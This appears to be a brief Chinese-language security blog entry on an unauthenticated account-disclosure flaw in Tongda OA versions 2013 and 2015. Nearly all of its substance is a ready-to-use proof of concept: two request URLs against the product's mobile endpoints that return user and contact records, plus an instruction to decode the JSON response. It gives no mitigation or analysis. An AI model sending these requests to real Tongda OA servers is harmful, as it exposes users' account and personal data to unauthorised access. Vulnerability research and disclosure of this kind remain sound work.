## 通达oa 未授权获取帐号
### 漏洞影响
2013、2015版本
### 复现过程
**PoC**
`http://url/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3`
`http://url/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50`
将返回的json进行解码
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后查看评论内容